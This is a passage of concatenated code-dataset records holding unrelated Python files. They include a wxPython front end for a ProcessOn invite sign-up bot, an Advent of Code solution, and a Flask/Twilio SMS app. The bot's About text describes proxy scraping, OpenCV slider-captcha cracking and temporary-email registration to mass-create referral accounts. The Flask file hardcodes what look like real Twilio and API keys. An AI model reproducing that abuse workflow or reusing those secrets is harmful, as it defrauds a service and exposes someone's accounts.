bs_all.Add(bs_log, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)\n        bs_all.Add(bs_signup, proportion=0, flag=wx.ALL | wx.EXPAND, border=5)\n        panel.SetSizer(bs_all)\n        self.logger = LOG(name=__name__, topic='log').getLogger()\n        # Subscribe to the message topics\n        pub.subscribe(self.updateButtonStatus, 'update')\n        pub.subscribe(self.updateLogMessage, 'log')\n\n    def initMenu(self):\n        # Menu bar\n        menubar = wx.MenuBar()\n        # 'Help' menu\n        help_menu = wx.Menu()\n        # 'About' menu item\n        about_item = wx.MenuItem(help_menu, wx.ID_ABOUT, '&About\\tCtrl+A')\n        self.Bind(wx.EVT_MENU, self.onAbout, about_item)\n\n        # 'Quit' menu item\n        quit_item = wx.MenuItem(help_menu, wx.ID_EXIT, '&Quit\\tCtrl+Q')\n        self.Bind(wx.EVT_MENU, self.onQuit, quit_item)\n\n        help_menu.Append(about_item)\n        help_menu.Append(quit_item)\n        menubar.Append(help_menu, '&Help')\n        menubar.SetBackgroundColour('Black')\n\n        self.SetMenuBar(menubar)\n\n    def onAbout(self, event):\n        description = \"\"\"\n        1. Obtain usable proxies from proxy websites\n        2. Crack the slider captcha with OpenCV and a sliding algorithm\n        3. 
Sign up via a temporary email inbox and collect the email verification code\n        \"\"\"\n        info = wx.adv.AboutDialogInfo()\n        info.SetIcon(wx.Icon(self.icon, wx.BITMAP_TYPE_ICO))\n        info.SetName('ProcessOn SignUp')\n        info.SetVersion('1.0.0')\n        info.SetDescription(description)\n        info.SetWebSite(r'https://www.processon.com')\n        info.AddDeveloper('Killua')\n        wx.adv.AboutBox(info)\n\n    def onQuit(self, event):\n        self.Close()\n\n    def onSignUpClick(self, event):\n        self.worker = WorkerThread(url=self.tc_link.GetValue(), numbers=int(self.ch_number.GetStringSelection()),\n                                   visual=self.ck_visualization.GetValue(), logger=self.logger)\n        event.GetEventObject().Disable()\n        self.ck_visualization.Disable()\n\n    def updateButtonStatus(self, msg):\n        if msg == 'start':\n            self.tc_log.AppendText(u'========== Invite sign-up started ==========\\n')\n        elif msg == 'finish':\n            self.tc_log.AppendText(u'========== Invite sign-up finished ==========\\n\\n')\n            self.worker = None\n            self.ck_visualization.Enable()\n            self.btn_signup.Enable()\n\n    def updateLogMessage(self, msg):\n        self.tc_log.AppendText(msg)\n\n\nif __name__ == '__main__':\n    app = wx.App()\n    ProcessOnFrame(None, title='ProcessOn invite sign-up - increase your personal file count', size=(600, 400))\n    app.MainLoop()\n    sys.exit(0)\n","repo_name":"vankillua/processon-signup","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"}
+{"seq_id":"72424385993","text":"with open('input_dec_7.txt') as file:\n    f = [line.strip('\\n') for line in file.readlines()]\n\nclass Directory:\n    def __init__(self, name, parent):\n        self.name = name\n        self.parent = parent\n        self.content = list()\n\n    def is_empty(self):\n        return len(self.content) == 0\n\n    def get_size(self):\n        return sum(list(map(lambda x: x.get_size(), self.content)))\n    \n\nclass File:\n    def __init__(self, size, name):\n        self.size = int(size)\n        self.name = name\n\n    def get_size(self):\n        return self.size\n\n\ncur_dir = Directory('/', None)\ndirectories = [cur_dir]\n\ndef find_dir(name):\n    for item in cur_dir.content:\n        if item.name == name:\n            return item\n\n\nfor i, line in enumerate(f):\n    commands = line.split()\n    if commands[0] == '$' and commands[1] == 'cd':\n        if commands[2] == '..':\n            cur_dir = cur_dir.parent\n        elif i > 0:\n            cur_dir = find_dir(commands[2])\n    \n    elif commands[0] == '$':\n        continue\n\n    elif commands[0] == 'dir':\n        dir = Directory(commands[1], cur_dir)\n        cur_dir.content.append(dir)\n        directories.append(dir)\n\n    else:\n        cur_dir.content.append(File(commands[0], commands[1]))\n\ndirectories.sort(key=lambda x: x.get_size())\navailable_space = 70_000_000 - directories[-1].get_size()\nneeded_space = 30_000_000 - available_space\n\ntotal_size = 0\nsize_smallest_dir = 0\nfor dir in directories:\n    size = dir.get_size()\n    if size <= 100_000:\n        total_size += size\n    if size >= needed_space:\n        size_smallest_dir = size\n        break\n\nprint(f'Answer part 1: {total_size}')\nprint(f'Answer part 2: {size_smallest_dir}')\n","repo_name":"Teun2305/Advent-of-code-2022","sub_path":"dec_7/code_dec_7.py","file_name":"code_dec_7.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"12917162726","text":"# -*- coding: utf-8 -*-\nfrom collections import namedtuple\n\n_checked = namedtuple('YoutubePack', ['result', 'origin_data', 'title', 'link', 'v'])\n\nclass YoutubePack(_checked):\n    def __new__(cls, result=False, origin_data='', title='', link='', v=''):\n        return super(YoutubePack, cls).__new__(cls, result, origin_data, title, link, 
v)\n\n    def as_dict(self):\n        d = {\n            'result': self.result,\n            'origin_data': self.origin_data,\n            'title': self.title,\n            'link': self.link,\n            'v': self.v,\n            # https://i.ytimg.com/vi_webp/[v]/hqdefault.webp\n            'thumbnail': \"https://i.ytimg.com/vi_webp/\" + self.v + \"/hqdefault.webp\",\n        }\n        return d","repo_name":"se0kjun/YoutubePlayListDownloader","sub_path":"youtube_playlist_downloader/youtube_pack.py","file_name":"youtube_pack.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"35126752400","text":"# coding=utf-8\nimport json\n# 4 entries need to be filled in.. fill them in by hand?\n# 35: one entry missing from each, handle manually... , {\"t\": \"16:30\", \"d\": [16342, 2622, 1904, 1044]}\n# 62\neid = \"68\"\nwith open(\"modif_data/\"+eid+\".json\") as f:\n\tdata = json.load(f)\n\nresult = {\"id\": eid, 'borders': [\n    100,\n    2500,\n    5000,\n    10000\n]}\nresult[\"log\"] = []\nfor i in data[\"data\"][\"logs\"]:\n\ttmp = {}\n\td = [i[\"borders\"][\"100\"],\n\t\ti[\"borders\"][\"2500\"],\n\t\ti[\"borders\"][\"5000\"],\n\t\ti[\"borders\"][\"10000\"]]\n\t\n\ttmp[\"d\"] = d\n\ttmp[\"t\"] = i['datetime'][11:16]\n\tresult[\"log\"].append(tmp)\n\nwith open('new_data/'+eid+'_modif.json', 'w') as f:\n\tjson.dump(result, f)","repo_name":"Tmn07/MLTD-rankingview","sub_path":"utils/data_clean2.py","file_name":"data_clean2.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"}
+{"seq_id":"23824687710","text":"from app.home import blueprint\nfrom flask import render_template,request,escape\nfrom flask_login import login_required\nfrom app.base.models import User,SentM,ReceiveM\nfrom app import db\n\nfrom twilio.rest import Client\nfrom twilio.twiml.messaging_response import Message, MessagingResponse\nimport requests\n\n# put your own credentials here\naccount_sid = \"ACffe02b6e6f367781b36d4251bc962952\"\nauth_token = \"dfa6787ca8be1a3884f7736ff5557d03\"\n\nsubscription_key = \"56bdc3a1166c49c89304c1c9e2f8cfae\"\nassert subscription_key\n\n\n@blueprint.route('/index',methods=['GET', 'POST'])\n@login_required\ndef index():\n    # <name> and <product> are placeholder tokens (reconstructed) swapped for the customer's details below\n    first_message = \"Hi <name>, I saw that your <product> was delivered. How are you enjoying it so far?\"\n    positive = \"Great, can you describe what you love most about <product>? \"\n    negative = \"I'm sorry to hear that, what do you dislike about <product>?\"\n    if request.method == 'POST':\n        #Get everything from the form\n        number = request.form['number']\n        prodType = request.form['prodType'] \n        name = request.form['fullname']\n        firstname = name.split()\n        firstname = firstname[0]\n        first_message = first_message.replace(\"<name>\",firstname)\n        first_message = first_message.replace(\"<product>\",prodType)\n        positive = positive.replace(\"<product>\",prodType)\n        negative = negative.replace(\"<product>\",prodType)\n        \n        #Twilio message send\n        client = Client(account_sid, auth_token)\n        client.messages.create(\n            to=number,\n            from_=\"+13092710302\",\n            body=first_message)\n        \n        #DB storage\n        sentM = SentM(phoneNum=number,name=name,text=first_message,prodtype=prodType)\n        db.session.add(sentM)\n        db.session.commit()\n        \n        \n        render_template('index.html',first_message=escape(first_message),positive=escape(positive),negative=escape(negative)) \n    return render_template('index.html',first_message=first_message,positive=positive,negative=negative) \n\n\n@blueprint.route('/